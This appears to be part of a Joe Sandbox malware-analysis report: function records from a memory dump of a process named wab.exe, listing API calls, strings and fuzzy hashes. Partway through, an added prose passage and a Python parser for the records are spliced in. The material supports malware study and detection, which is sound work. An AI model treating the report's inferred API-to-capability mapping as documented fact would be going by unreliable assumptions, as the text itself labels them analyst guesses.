                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 1775345501-2769808009
                                                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • wcscpy.MSVCRT ref: 0041477F
                                                                                              • wcscpy.MSVCRT ref: 0041479A
                                                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                                                              • String ID: General
                                                                                              • API String ID: 999786162-26480598
                                                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 313946961-1552265934
                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                              • API String ID: 0-1953309616
                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                              • API String ID: 3510742995-272990098
                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: gj
                                                                                              • API String ID: 1297977491-4203073231
                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                              • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2903831945-0
                                                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                              • String ID:
                                                                                              • API String ID: 1471605966-0
                                                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
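The records above describe, for each function recovered from the dumped wab.exe image (process 12, region 0x400000), the APIs it reaches directly and through callees ("Part of subcall function"), the strings it references, and a set of identity hashes. As an added example (my code, not Joe Sandbox's and not the sample's), the Python below parses records of that shape into structured data and derives, per function, its callee addresses, a capability-tag profile and a locator address. The record grammar, the "$" separator in "String ID" and the API-to-capability mapping are inferences from this listing, not documented Joe Sandbox behaviour; the sample input is two of the records above, trimmed.

```python
"""Parse Joe Sandbox IDA-plugin function records (the APIs / Similarity /
Uniqueness blocks above) into structured data, then derive a capability
profile and callee list per function.  Added example, not Joe Sandbox code;
the record grammar is inferred from this page's listing."""
import re
from collections import defaultdict

# One API bullet: optional "Part of subcall function <addr>:" prefix (an API
# reached through a callee), then Name.MODULE[(args)], then "ref: <addr>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*"
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# API -> capability tag: an analyst-chosen mapping (assumption), not from the report.
CAPABILITIES = {api: tag for tag, apis in {
    "file-read": ("CreateFileW", "GetFileSize", "ReadFile"),
    "dynamic-import": ("GetSystemDirectoryW", "LoadLibraryW", "GetProcAddress", "FreeLibrary"),
    "ui-scrape": ("EnumChildWindows", "SetWindowTextW", "SendDlgItemMessageW"),
    "heap": ("??2@YAPAXI@Z", "??3@YAXPAX@Z"),
}.items() for api in apis}

def parse_records(text):
    """Every record opens with an 'APIs' header; bullets under it are API calls,
    any other 'Key: value' line lands in rec['fields']."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "fields": {}}
                records.append(rec)
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            rec["apis"].append({
                "name": m["name"], "module": m["module"], "ref": m["ref"].upper(),
                "args": m["args"].split(",") if m["args"] else [],
                "parent": m["parent"].upper() if m["parent"] else None})  # None: direct
        elif rec is not None:
            key, _, value = line.lstrip("•").partition(":")
            rec["fields"][key.strip()] = value.strip()
    return records

def strings_of(rec):
    """Strings are '$'-joined in 'String ID' (assumption; it matches
    'SHAutoComplete$shlwapi.dll' against the GetProcAddress argument)."""
    return [s for s in rec["fields"].get("String ID", "").split("$") if s]

def api_string_id(rec):
    """'API String ID: <api hash>-<string hash>'; string hash 0 means no strings."""
    a, _, s = rec["fields"]["API String ID"].partition("-")
    return int(a), int(s)

def callees(rec):
    """Functions this one calls, from the 'Part of subcall' prefixes."""
    return sorted({a["parent"] for a in rec["apis"] if a["parent"]})

def capability_profile(rec):
    """Capability tags with hit counts over direct and subcall APIs."""
    prof = defaultdict(int)
    for a in rec["apis"]:
        if a["name"] in CAPABILITIES:
            prof[CAPABILITIES[a["name"]]] += 1
    return dict(prof)

def locate(rec):
    """Lowest direct 'ref': the record never states the function start itself."""
    refs = [int(a["ref"], 16) for a in rec["apis"] if a["parent"] is None]
    return min(refs) if refs else None

# Constructed input: two records copied from the listing above, with hash lines
# and some subcall bullets dropped for brevity.
SAMPLE = """
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT ref: 004450BE
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
"""
RECORDS = parse_records(SAMPLE)
```

Run over a whole report, `callees` yields call-graph edges inside the dump (here the function around 0x4450AA reaches CreateFileW through 004096C3, ReadFile through 0040A2EF and memchr/memcpy through 00444E84, which reads as "open a file, read it into a heap buffer, parse it"), and the `api_string_id` pair is the value to pivot on when looking for the same function in other reports, since it hashes the API set and the string set together.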

                                                                                              APIs
                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                              • String ID: \StringFileInfo\
                                                                                              • API String ID: 102104167-2245444037
                                                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$??3@
                                                                                              • String ID: g4@
                                                                                              • API String ID: 3314356048-2133833424
                                                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memicmpwcslen
                                                                                              • String ID: @@@@$History
                                                                                              • API String ID: 1872909662-685208920
                                                                                              • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                              • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3400436232-259020660
                                                                                              • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                              • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                              • String ID: caption
                                                                                              • API String ID: 1523050162-4135340389
                                                                                              • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                              • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 210187428-168460110
                                                                                              • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                              • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 2747424523-2167791130
                                                                                              • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                              • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                              • API String ID: 3150196962-1506664499
